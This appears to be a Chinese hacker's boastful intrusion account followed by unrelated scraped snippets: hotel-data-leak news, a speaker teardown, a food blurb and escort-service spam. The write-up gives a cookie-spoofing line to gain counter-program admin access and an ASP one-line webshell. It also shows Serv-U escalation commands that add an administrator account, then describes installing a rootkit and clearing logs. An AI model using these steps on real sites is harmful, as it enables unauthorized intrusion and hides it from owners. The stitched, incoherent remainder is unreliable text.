DB_OWNER权限,SQL Server禁止多句执行(偶就不能通过WEB方式备份得到shell了),开了3389(冲着它来的) 后台没什么功能,想放弃,可发现了下面的一幕 发现了一个计数器程序的readme http://www.abc.com/count/readme.txt 有说明就好办,从网上下了个源程序来 发现漏洞文件count/admin.asp代码如下 _____________________________________________________________ <% '****************************** ' ' 飞越访客单用户统计系统 ' 飞越 feiyueziwo@sohu.com ' www.pwsite.net ' ' 版权所有: 动力在线 ' '****************************** %> <% response.write Request.Cookies(feiyue)("Username") if Request.Cookies(feiyue)("Username")="" then response.end response.Redirect("login.asp?action=error") end if%> ........... _____________________________________________________________ cookies欺骗一句话就可以搞定 再IE里输入以下代码,再访问http://www.abc.com/count/admin.asp就是管理员了 javascript:document.cookie="feiyue=Username=cooldiyer"; 后台没什么可利用,郁闷,数据库插马本机测试可以成功,可它网站的不行,压缩了数据库还不行, 后台不能上传文件,只一个备份数据库功能,利用这个功能把数据库连接文件给显示了出来,得到 SQL Server连接用户和密码,远程连接后备份数据库log得到一个shell 主机开了Serv-U 6.2,上传Serv-U本地提权工具ftp.exe 写了一句话木马如下: <%=Server.CreateObject("wscript.shell").exec(request("cmd")).stdout.readall%> 执行: http://www.abc.com/shell.asp?cmd=D:\www\ftp.exe "net user cooldiyer /add" http://www.abc.com/shell.asp?cmd=D:\www\ftp.exe "net localgroup administrators cooldiyer /add" 成功!连其3389端口,安上rootkit,CA一个管理员,CleanLog,闪人.......
“每10个国人,就有一个‘住’客。”在华住酒店集团官网上,这样的广告宣传语在首页滚动播放,这与网帖中所“挂售”的1.3亿人身份证信息“不谋而合”。(东方IC/图) “出售华住旗下所有酒店数据,官...
从侧边撬开360AI音箱的钢网罩,侧边加了一层软泡棉,用来填补缝隙,使网罩与音箱主体更加紧密连接。 去掉钢网罩后可看到音腔通过8颗螺丝固定在音箱的壳体,音腔顶盖和壳体之间通过胶棉粘合,组成整个音腔,...
多吃不但能够补钙补锌还能够补气血,味儿十分的美味,女士应当常常服用,还具备一定的减肥功效,想不想了解这个是什么食材呢?山药豆和它是最佳搭档,做粥补钙补锌又益气养血,鲜香气美,冬天喝最好! 这一食材便是...
上海商务在哪里【】 今日给大伙儿共享的內容是“上海商务在哪里【】”,我是郑欣淼,来源于黄南藏族自治州,2020年二十一岁,做为岗位:未表露,我喜爱我的岗位:未表露。三圍:胸65腰86臀61 鞋碼:36...
$this->session_table = $session_table;盲眼鹰(APT-C-36)1.3 逃逸进犯的研讨方向本文即将介绍以下内容:2、浏览器历史记录,PowerShell4....
伴游泰国攻略-少付预约不二之选 伴游描述:最近有很多朋友在商务预约网后台留言,想了解关于伴游泰国攻略信息。于是小编通过百度、知乎、文库等途径,总结了以下关于伴游泰国攻略的全部内容。希望对大家有所帮...